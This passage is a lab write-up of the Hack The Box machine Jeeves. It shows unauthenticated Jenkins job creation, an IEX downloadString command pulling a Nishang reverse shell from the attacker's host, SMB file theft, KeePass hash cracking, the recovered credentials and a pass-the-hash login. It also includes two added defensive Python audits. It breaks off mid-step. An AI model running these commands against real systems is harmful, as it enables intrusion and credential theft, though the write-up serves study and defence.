Jeeves – No Metasploit

Fire up autorecon and run some scans… I did this while I went to http://10.10.10.63. It’s a good habit to just try port 80 while your scans are running so you’re not wasting time.

So when we go to the website and try searching, anything we do results in this:

Server Error in '/' Application.

Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.4053.00 (Intel X86)
May 26 2009 14:24:20
Copyright (c) 1988-2005 Microsoft Corporation
Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
' to data type int.

Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

Exception Details: System.Data.SqlClient.SqlException: Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.4053.00 (Intel X86)
May 26 2009 14:24:20
Copyright (c) 1988-2005 Microsoft Corporation
Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
' to data type int.

Source Error:

But the weird thing is… it’s a fake image, so this is a dead end.

I waited a bit and got my scans back. Let’s look at nmap:

Nmap scan report for 10.10.10.63
Host is up, received user-set (0.044s latency).
Scanned at 2020-05-27 16:17:20 EDT for 192s
Not shown: 65531 filtered ports
Reason: 65531 no-responses
PORT      STATE SERVICE      REASON          VERSION
80/tcp    open  http         syn-ack ttl 127 Microsoft IIS httpd 10.0
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Ask Jeeves
135/tcp   open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
445/tcp   open  microsoft-ds syn-ack ttl 127 Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open  http         syn-ack ttl 127 Jetty 9.4.z-SNAPSHOT
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Error Not Found
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2008 (88%)
OS CPE: cpe:/o:microsoft:windows_server_2008:r2
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Microsoft Windows Server 2008 R2 (88%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
OPS(O1

Okay so there’s a port 50000 as well. I like to switch up the enumeration tools so this time I wanted to try using wfuzz. Running wfuzz on port 80 didn’t show anything new. However, on port 50000:

kali@hyd3:~/Tools/AutoRecon/results/10.10.10.63/scans$ wfuzz -c -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hc 404 http://10.10.10.63:50000/FUZZ
Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.63:50000/FUZZ
Total requests: 220560

===================================================================
ID           Response   Lines    Word     Chars       Payload
===================================================================

000041607:   302        11 L     26 W     318 Ch      "askjeeves"
000048313:   pending                                   "bt3"

Finishing pending requests...

Alright… Let’s navigate to http://10.10.10.63:50000/askjeeves/

Screenshot: the Jenkins dashboard at /askjeeves/, viewed without logging in. Sidebar: New Item, People, Build History, Manage Jenkins, Credentials. Build Queue: No builds in the queue. Build Executor Status: 1 Idle, 2 Idle. The job list shows existing jobs with Last Success 7 hr 56 min ago (#10) and 7 hr 28 min ago (#1), Last Failure 7 hr 25 min ago (#16), Last Duration 2.3 sec and 2.6 sec, plus the "RSS for all / RSS for failures / RSS for just latest builds" links. A "log in" link sits at the top right.

Interesting. I tried logging in with default creds and common lists, but nothing worked. I then just started poking around at the site to see what I could do without logging in.

Looks like we can create a project.

Screenshot: the Jenkins "New Item" page, reachable without logging in. "Enter an item name" field (Required field), with item types:
    Freestyle project: This is the central feature of Jenkins. Jenkins will build your project, combining any SCM with any build system, and this can be even used for something other than software build.
    Pipeline: Orchestrates long-running activities that can span multiple build slaves. Suitable for building pipelines (formerly known as workflows) and/or organizing complex activities that do not easily fit in free-style job type.
    Multi-configuration project: Suitable for projects that need a large number of different configurations, such as testing on multiple environments, platform-specific builds, etc.
    Folder: Creates a container that stores nested items in it. Useful for grouping things together. Unlike view, which is just a filter, a folder creates a separate namespace, so you can have multiple things of the same name as long as they are in different folders.
    GitHub Organization: Scans a GitHub organization (or user account) for all repositories matching some defined markers.
    Multibranch Pipeline: Creates a set of Pipeline projects according to detected branches in one SCM repository.
Below that: "If you want to create a new item from other existing, you can use this option:" with a "Type to autocomplete" field. The page still shows "log in" at the top right.

Now clicking around and scrolling down… we see something very interesting:

Screenshot: the configuration page for the new job "pingme". Tabs: General, Source Code Management, Build Triggers, Build Environment, Build, Post-build Actions. Build Triggers offers Build periodically, GitHub hook trigger for GITScm polling, Poll SCM. Build Environment offers Delete workspace before build starts, Abort the build if it's stuck, Add timestamps to the Console Output, Use secret text(s) or file(s), With Ant. The "Add build step" dropdown under Build lists:
    Execute Windows batch command
    Execute shell
    Invoke Ant
    Invoke Gradle script
    Invoke top-level Maven targets
    Run with timeout
    Set build status to "pending" on GitHub commit
Footer: Page generated: May 28, 2020 2:24:53 PM EDT, REST API, Jenkins ver. 2.87.

This looks like a clear path to RCE. Let’s test it out:

Screenshot: Build section with an "Execute Windows batch command" step added. Command:

ping 10.10.14.30

Below it: "See the list of available environment variables", "Add build step", Post-build Actions / "Add post-build action", and the Apply and Advanced buttons.

After saving it, I had to figure out how to trigger it. The “build now” button seemed like a good candidate:

Screenshot: the job sidebar with Build Now, Delete Project, Configure, and a Build History panel (with a "find" box and "trend" link) showing one build at May 28, 2020 2:26 PM.

Running tcpdump on my box, I see the ICMP requests coming through:

kali@hyd3:~/Tools/AutoRecon/results/10.10.10.63/scans$ sudo tcpdump -i tun0
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on tun0, link-type RAW (Raw IP), capture size 262144 bytes
IP hyd3.50664 > 10.10.10.63.50000: Flags [P.], seq 984844400:984845062, ack 3063434529, win 501, options [nop,nop,TS val 1480055907 ecr 40178073], length 662
09:22:24.973560 IP 10.10.10.63.50000 > hyd3.50664: Flags [P.], seq 1:206, ack 662, win 254, options [nop,nop,TS val 40181743 ecr 1480055907], length 205
09:22:24.973596 IP hyd3.50664 > 10.10.10.63.50000: Flags [.], ack 206, win 501, options [nop,nop,TS val 1480055951 ecr 40181743], length 0
09:22:25.043798 IP 10.10.10.63 > hyd3: ICMP echo request, id 1, seq 5
09:22:25.043814 IP hyd3 > 10.10.10.63: ICMP echo reply, id 1, seq 5
09:22:26.061409 IP 10.10.10.63 > hyd3: ICMP echo request, id 1, seq 6
09:22:26.061442 IP hyd3 > 10.10.10.63: ICMP echo reply, id 1, seq 6
09:22:26.312795 IP hyd3.50664 > 10.10.10.63.50000: Flags [P.], seq 662:1331, ack 206, win 501, options [nop,nop,TS val 1480057290 ecr 40181743], length 669
IP 10.10.10.63.50000 > hyd3.50664: Flags [P.], seq 206:1161, ack 1331, win 252, options [nop,nop,TS val 40183134 ecr 1480057290], length 955
IP hyd3.50664 > 10.10.10.63.50000: Flags [.], ack 1161, win 501, options [nop,nop,TS val 1480057342 ecr 40183134], length 0
IP 10.10.10.63 > hyd3: ICMP echo request, id 1, seq 7
IP hyd3 > 10.10.10.63: ICMP echo reply, id 1, seq 7
IP 10.10.10.63 > hyd3: ICMP echo request, id 1, seq 8
IP hyd3 > 10.10.10.63: ICMP echo reply, id 1, seq 8
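The root cause on this box is not a Jenkins bug but its authorization setup: anyone can reach "New Item" and add a build step, and a build step is code execution on the controller. The following Python is an added example (not the author's code, and not part of Jenkins) that audits a controller's config.xml for exactly that condition, so a defender can catch it before a scan does. The two config.xml documents are constructed samples; the element and class names are the ones Jenkins writes under $JENKINS_HOME/config.xml.

```python
# Added example, not the author's or the Jenkins project's code: audit a Jenkins
# config.xml for authorization settings that let the anonymous user create or
# configure jobs (and therefore run arbitrary build steps on the controller).
import xml.etree.ElementTree as ET

# Permissions that, when granted to 'anonymous', give arbitrary build-step control.
JOB_CONTROL_PERMISSIONS = {
    "hudson.model.Hudson.Administer",  # Overall/Administer implies every other permission
    "hudson.model.Hudson.RunScripts",  # script console (older releases)
    "hudson.model.Item.Create",        # create a new job: the path used in this write-up
    "hudson.model.Item.Configure",     # edit the build steps of an existing job
}

def audit_jenkins_config(config_xml: str) -> list:
    """Return finding strings; an empty list means anonymous has no job control."""
    root = ET.fromstring(config_xml)
    findings = []

    if (root.findtext("useSecurity") or "").strip().lower() != "true":
        return ["useSecurity is not true: access control is switched off entirely"]

    strategy = root.find("authorizationStrategy")
    if strategy is None:
        return ["no authorizationStrategy element: behaves as Unsecured"]

    cls = strategy.get("class", "")
    if cls.endswith("AuthorizationStrategy$Unsecured"):
        findings.append("authorizationStrategy is Unsecured: anonymous has full control")
    elif cls.endswith("FullControlOnceLoggedInAuthorizationStrategy"):
        # Anonymous cannot create jobs here, but every account that can log in gets
        # full control, so the security realm's account list carries all the risk.
        deny = (strategy.findtext("denyAnonymousReadAccess") or "false").strip().lower()
        if deny != "true":
            findings.append("anonymous read access allowed: job names, build logs and "
                            "workspace contents are exposed without login")
    elif cls.endswith("MatrixAuthorizationStrategy"):
        # Entries look like 'hudson.model.Item.Create:anonymous' or, with newer
        # matrix-auth plugin releases, 'GROUP:hudson.model.Item.Create:anonymous'.
        for perm in strategy.findall("permission"):
            parts = (perm.text or "").strip().split(":")
            if len(parts) < 2:
                continue
            permission, sid = parts[-2], parts[-1]
            if sid == "anonymous" and permission in JOB_CONTROL_PERMISSIONS:
                findings.append(f"{permission} granted to anonymous")
    else:
        findings.append(f"unrecognised authorizationStrategy {cls!r}: review by hand")
    return findings

# Constructed sample: matrix authorization that hands job creation to anonymous.
WEAK_CONFIG = """<hudson>
  <version>2.87</version>
  <useSecurity>true</useSecurity>
  <authorizationStrategy class="hudson.security.GlobalMatrixAuthorizationStrategy">
    <permission>hudson.model.Hudson.Administer:admin</permission>
    <permission>hudson.model.Hudson.Read:anonymous</permission>
    <permission>hudson.model.Item.Create:anonymous</permission>
    <permission>hudson.model.Item.Read:anonymous</permission>
  </authorizationStrategy>
  <securityRealm class="hudson.security.HudsonPrivateSecurityRealm">
    <disableSignup>true</disableSignup>
  </securityRealm>
</hudson>"""

# Constructed sample: the same instance with nothing granted to anonymous.
HARDENED_CONFIG = """<hudson>
  <version>2.87</version>
  <useSecurity>true</useSecurity>
  <authorizationStrategy class="hudson.security.GlobalMatrixAuthorizationStrategy">
    <permission>USER:hudson.model.Hudson.Administer:admin</permission>
    <permission>GROUP:hudson.model.Hudson.Read:authenticated</permission>
    <permission>GROUP:hudson.model.Item.Read:authenticated</permission>
  </authorizationStrategy>
  <securityRealm class="hudson.security.HudsonPrivateSecurityRealm">
    <disableSignup>true</disableSignup>
  </securityRealm>
</hudson>"""

if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, audit_jenkins_config(cfg) or ["no anonymous job control"])
```

Run it against a copy of the controller's config.xml; the weak sample yields one finding (Item.Create for anonymous) and the hardened one yields none. Pairing the check with a security realm that has signup disabled closes the other easy route, since a self-registered account would otherwise be as good as anonymous.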

Now it’s as simple as creating a reverse PowerShell script with Nishang and appending a callback to our box at the bottom:

    catch
    {
        Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port."
        Write-Error $_
    }
}
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.30 -Port

Serve up the PowerShell script:

kali@hyd3:~/Documents/htb/jeeves$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.10.63 - - [28/May/2020 09:36:12] "GET /Invoke-PowerShellTcp.ps1 HTTP/1.1" 200 -

Modify the build request:

Screenshot: Build section, "Execute Windows batch command" step. Command:

IEX(New-Object Net.WebClient).downloadString('http://10.10.14.30:8000/Invoke-PowerShellTcp.ps1')

Below it: "See the list of available environment variables", "Add build step".

Once you trigger it, you should receive a callback on your listener:

kali@hyd3:~/Documents/htb/jeeves$ rlwrap nc -nvlp
listening on [any] ...
connect to [10.10.14.30] from (UNKNOWN) [10.10.10.63] 49688
Windows PowerShell running as user kohsuke on JEEVES
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:> whoami
jeeves\kohsuke
PS C:> hostname
Jeeves

As a force of habit, I uploaded nc.exe and used it to get a binary shell as well.

Some simple enumeration showed an interesting file: CEH.kdbx

    Directory of C:

05/28/2020  02:42 PM    <DIR>          .
05/28/2020  02:42 PM    <DIR>          ..
09/18/2017  01:43 PM             2,846 CEH.kdbx

I tried copying the file with nc.exe but it was way too slow (if at all). I ended up using SMB:

kali@hyd3:~/Documents/htb/jeeves/smb$ sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py hyd3 /home/kali/Documents/htb/jeeves/smb
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

Map the share as a PSDrive on the victim box and navigate to it:

PS C:> New-PSDrive -Name "hyd3" -PSProvider "FileSystem" -Root "\\10.10.14.30\hyd3"

Name  Used (GB)  Free (GB)  Provider    Root                CurrentLocation
----  ---------  ---------  --------    ----                ---------------
hyd3                        FileSystem  \\10.10.14.30\hyd3

Copy the file over.

Running file on it confirms it’s a KeePass database. Crack it with hashcat; to do that, first extract the hash with keepass2john:

kali@hyd3:~/Documents/htb/jeeves/smb$ /usr/sbin/keepass2john CEH.kdbx > ceh.hash
kali@hyd3:~/Documents/htb/jeeves/smb$ cat ceh.hash
CEH:3766b61e656351c3aca0282f1617511031f0156089b6c5647de4671972fcff*cb409dbc0fr660fcffr4f1cc89f728b68254db431a21ec33298b612fe647db48
kali@hyd3:~/Documents/htb/jeeves/smb$ vi ceh.hash

Locate the hashcat mode (-m) for this hash format: KeePass is mode 13400.

Hashcat is not expecting the "CEH:" file name before the hash, so edit that out and then run hashcat with rockyou.txt:

kali@hyd3:~/Documents/htb/jeeves/smb$ vi ceh.hash
kali@hyd3:~/Documents/htb/jeeves/smb$ cat ceh.hash
b61e656351c3aca0282f1617511031f0156089b6c5647de4671972fcff*cb409dbc0fr660fcffr4f1cc89f728b68254db431a21ec33298b612fe647db48
kali@hyd3:~/Documents/htb/jeeves/smb$ hashcat -m 13400 -w 1 /usr/share/wordlists/rockyou.txt ceh.hash
hashcat (v5.1.0) starting...

OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-AMD Ryzen 7 2700 Eight-Core Processor, 1024/2272 MB allocatable, 4MCU

Counted lines in /usr/share/wordlists/rockyou.txt... Insufficient memory available
Insufficient memory available
Segmentation fault

Whoops… This happened because I swapped the wordlist and the actual hash… so hashcat thought it was cracking a much larger file.

kali@hyd3:~/Documents/htb/jeeves/smb$ hashcat -m 13400 -a 0 ceh.hash /usr/share/wordlists/rockyou.txt
hashcat (v5.1.0) starting...

OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-AMD Ryzen 7 2700 Eight-Core Processor, 1024/2272 MB allocatable, 4MCU

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Single-Hash
* Single-Salt

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

* Device #1: build_opts '-cl-std=CL1.2 -I OpenCL -I /usr/share/hashcat/OpenCL -D LOCAL_MEM_TYPE=2 -D VENDOR_ID=64 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=8 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=1 -D DGST_R2=2 -D DGST_R3=3 -D DGST_ELEM=4 -D KERN_TYPE=13400 -D _unroll'
* Device #1: Kernel m13400-pure.ce8862df.kernel not found in cache! Building may take a while...

b61e656351c3aca0282f1617511031f0156089b6c5647de4671972fcff*cb409dbc0fr660fcffr4f1cc89f728b68254db431a21ec33298b612fe647db48:moonshine1

Session..........: hashcat
Status...........: Cracked
Hash.Type........: KeePass 1 (AES/Twofish) and KeePass 2 (AES)
Hash.Target......: ...47db48
Time.Started.....: Thu May 28 2020 (31 secs)
Time.Estimated...: Thu May 28 2020 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:     1760 H/s (12.21ms) @ Accel:512 Loops:64 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 55296/14344385 (0.39%)
Rejected.........: 0/55296 (0.00%)
Restore.Point....: 53248/14344385 (0.37%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:5952-6000
Candidates.#1....: soydivina -> grad2010

Started: Thu May 28 2020
Stopped: Thu May 28 2020

So we found that the password for the file is moonshine1.
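Two things in that hashcat output are worth reading as a defender: the "CEH:" prefix that had to be stripped, and the numbers (1760 H/s, 14344385 candidates in rockyou, cracked after 55296 guesses). The Python below is an added example, not the author's code, that parses a keepass2john line the way hashcat needs it, reads the KDF work factor out of it, and turns those numbers into an estimate of how long a wordlist run takes and how much a higher round count would slow it. The hash line is a constructed stand-in with the same shape as keepass2john output; the real CEH.kdbx hash is not reproduced, and the 6000 rounds in the sample are an assumption.

```python
# Added example, not the author's code: keepass2john output handling plus a
# cracking-cost estimate built from the figures hashcat printed above.

ROCKYOU_LINES = 14344385      # wordlist size, from hashcat's Progress line
OBSERVED_RATE_HPS = 1760.0    # guesses per second hashcat reported for this file
FOUND_AT_CANDIDATE = 55296    # Progress when the password was recovered

# Constructed sample line: '<name>:$keepass$*<version>*<rounds>*...' with dummy hex.
SAMPLE_JOHN_LINE = ("CEH:$keepass$*2*6000*222*" + "11" * 32 + "*" + "22" * 32
                    + "*" + "33" * 16 + "*" + "44" * 32 + "*" + "55" * 32)

def strip_john_prefix(line: str) -> str:
    """keepass2john writes '<name>:$keepass$...'; hashcat -m 13400 wants the bare hash."""
    idx = line.find("$keepass$*")
    if idx < 0:
        raise ValueError("no $keepass$ hash on this line")
    return line[idx:].strip()

def parse_keepass_hash(h: str) -> dict:
    """Split '$keepass$*<version>*<transform rounds>*...' into its parts.
    Everything after the round count is hex material taken from the database header."""
    if not h.startswith("$keepass$*"):
        raise ValueError("missing $keepass$ prefix")
    fields = h[len("$keepass$*"):].split("*")
    version, rounds = int(fields[0]), int(fields[1])
    if version not in (1, 2):
        raise ValueError(f"unsupported KeePass hash version {version}")
    for f in fields[2:]:
        if f and not all(c in "0123456789abcdefABCDEF" for c in f):
            raise ValueError(f"non-hex field {f[:16]!r}")
    return {"version": version, "rounds": rounds, "field_count": len(fields)}

def seconds_to_exhaust(wordlist_lines: int, rate_hps: float) -> float:
    """Worst case for a straight wordlist run: every candidate tried once."""
    return wordlist_lines / rate_hps

def seconds_to_candidate(position: int, rate_hps: float) -> float:
    """Time until a password sitting at a given position in the wordlist is reached."""
    return position / rate_hps

def rate_at_rounds(rate_hps: float, rounds_now: int, rounds_new: int) -> float:
    """AES-KDF cost grows linearly with the round count, so the guess rate drops in
    proportion (approximation: ignores fixed per-guess overhead)."""
    return rate_hps * rounds_now / rounds_new

def summarise(line: str = SAMPLE_JOHN_LINE) -> dict:
    info = parse_keepass_hash(strip_john_prefix(line))
    slower = rate_at_rounds(OBSERVED_RATE_HPS, info["rounds"], info["rounds"] * 100)
    return {
        **info,
        "hours_to_exhaust_rockyou": seconds_to_exhaust(ROCKYOU_LINES, OBSERVED_RATE_HPS) / 3600,
        "seconds_to_this_password": seconds_to_candidate(FOUND_AT_CANDIDATE, OBSERVED_RATE_HPS),
        "hours_to_exhaust_rockyou_100x_rounds": seconds_to_exhaust(ROCKYOU_LINES, slower) / 3600,
    }

if __name__ == "__main__":
    for k, v in summarise().items():
        print(f"{k}: {v}")
```

What the numbers say: at 1760 H/s the whole of rockyou takes about 2.3 hours, and a password 55296 lines in falls in about 31 seconds, matching the Time.Started line above. A hundred times more KDF rounds stretches the full run to roughly 226 hours, which is real but only linear; a master password that is not in a public wordlist is what actually defeats this attack, with a modern KDF (KDBX 4 supports Argon2) as the second layer.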

Looking through everything in the kdbx file, we find:

Screenshot: KeePassX with CEH.kdbx open [read-only]. Groups: CEH > General, Windows, Network, Internet, eMail, Homebanking. Database entries:

Title                Username        URL
Backup stuff
Bank of America      Michael321      https://www.bankofamerica.com
DC Recovery PW       administrator
EC-Council           hackerman123    https://www.eccouncil.org/progra...
It's a secret        admin           http://localhost:8180/secret.jsp
Jenkins admin        admin           http://localhost:8080
Keys to the king...  bob
Walmart.com          anonymous       http://www.walmart.com

Taking note of all the credentials found:

Backup stuff : aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00
Michael321 : 12345
administrator : SITjAtJHKsugh90C4VZ1
hackerman123 : pwndyouall!
admin : F7WhTrSFDKB6sxHU1cun
bob : ICEUnYPjNf1uPZSzOySA
anonymous : password

So I tried using smbexec with either of the administrator passwords with no luck… but I knew that the first line was a hash, so I attempted to pass the hash… and got a system shell:

kali@hyd3:~/Documents/htb/jeeves/smb$ pth-winexe -U administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 //10.10.10.63 cmd.exe
E_md4hash wrapper called.
HASH PASS: Substituting user supplied NTLM HASH...
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.

C:\Windows>whoami
jeeves\administrator

C:\Windows>hostname
Jeeves

Grabbing the user and root flags:

C:\Users>cd Administrator

C:\Users\Administrator>cd Desktop

C:\Users\Administrator\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is BE50-B1C9

 Directory of C:\Users\Administrator\Desktop

11/08/2017  10:05 AM    <DIR>          .
11/08/2017  10:05 AM    <DIR>          ..
12/24/2017  03:51 AM                36 hm.txt
11/08/2017  10:05 AM               797 Windows 10 Update Assistant.lnk
               2 File(s)            833 bytes
               2 Dir(s)   7 bytes free

C:\Users\Administrator\Desktop>cd
'cd' is not recognized as an internal or external command,
operable program or batch file.

C:\Users\Administrator\Desktop>type hm.txt
The flag is elsewhere.  Look deeper.

What? Deeper?

Ok, maybe an alternate data stream… I found an online tutorial using streams.exe but it didn’t want to work for me, so I found a PowerShell alternative:
